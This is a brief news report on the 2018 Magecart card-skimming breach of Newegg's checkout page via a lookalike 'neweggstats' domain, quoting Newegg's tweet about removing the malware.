The infamous criminal collective known as Magecart has successfully infiltrated the Newegg site and stole the stored payment card details stored by the company’s customers. This is a critical breach into the online merchant’s systems as the criminals were able to obtain a very large database of sensitive content. This is a yet-another infiltration of this hacker group which shows that its members are capable of getting into many major online services and companies.
Magecart Hackers Hacked Newegg & Acquired Customer Payment Card Data
The exact attack mechanism that allowed the intrusion is the creation of a similar sounding domain called neweggstats which appears to have been created back in 2015. The hackers have been able to acquire a SSL certificate issued by a legitimate provider. By infiltrating the Newegg servers and specifically the checkout page used by the payment processor. The hacker-controlled page will be the one that will acquire the information.
Both desktop and mobile customers are affected by the breach however the number of affected customers is not known. Statistics showcase that more the site has more than 50 million visitors. The fact that the digital skimmer code was available for a significant period of time gives security researchers reasons to believe that millions of customers are potentially affected.
Two years ago a report has shown that the same collective was responsible for another major attack focusing on a large number of sites. A similar strategy was used to back then showing that the criminals are specialized in this strategy.
Following the incident Newegg posted a Tweet with their comment:
Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site. We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted. Please check your email
— Newegg (@Newegg) September 19, 2018
We anticipate that the Magecart hackers will continue with their attacks. The worrisome act is that there is no information available about the exact way they were able to breach the secure servers.